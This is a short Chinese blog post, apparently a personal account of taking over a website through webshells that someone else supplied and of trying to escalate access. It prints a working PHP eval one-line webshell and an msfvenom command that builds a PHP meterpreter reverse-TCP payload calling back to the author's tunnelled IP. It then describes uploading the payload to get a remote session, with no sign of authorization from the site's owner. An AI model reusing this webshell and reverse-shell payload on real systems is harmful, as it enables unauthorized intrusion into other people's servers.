记录一次实战渗透-webshell提权


avatar
anonl 2024-01-06 896

  • 渗透记录

在一天某人突然发来了一些webshell给我告诉我是用0day挖的,属实震惊到我了!!!

居然挖到了0day!!!

依照Ta提供的webshell使用蚁剑成功连接

然后来到真正大展身手的时候了,在观察站内文件时看到Ta使用的是简单的一句话木马甚至没有进行任何的过狗一句话处理

<?php eval($_POST['password']);?>

竟然是使用的eval POST最简单的一句话木马,据Ta所说是使用越权和文件上传漏洞所拿下的网站现在来进一下步提权看看叭!

  • 对webshell进行进一步渗透

我先是尝试了使用msf的linux木马来进行提权,但发现始终连接不上

emmmmmmm………

我仔细检查了webshell的系统版本和架构还有我的内网穿透,也更换了木马的系统架构但还是无法连上,这就很奇怪了捏?

最后我尝试使用msf的php大马来提权

使用命令制作木马并且配置好内网穿透

msfvenom -p php/meterpreter/reverse_tcp lhost=内网穿透IP lport=内网穿透端口 msf.php

成功的上传了php大马尝试给予权限并连接

打开蚁剑的终端执行指令

msf这边也弹出来了控制界面

现在可以正常控制上传下载查看信息等操作但进一步的权限提升需要继续操作

此文章还未完全写完,还没有进行后续更高权限的提升

博主写文章到凌晨三点才写完!!!希望评论一下吧!谢谢!

 

  • avatar
    游客

    博主博客装个图片灯箱插件吧,不能放大图片看不清图片。 :cry:

    • avatar
      博主

      @ fntr 好的好的,抱歉打扰你的观看体验了

发表评论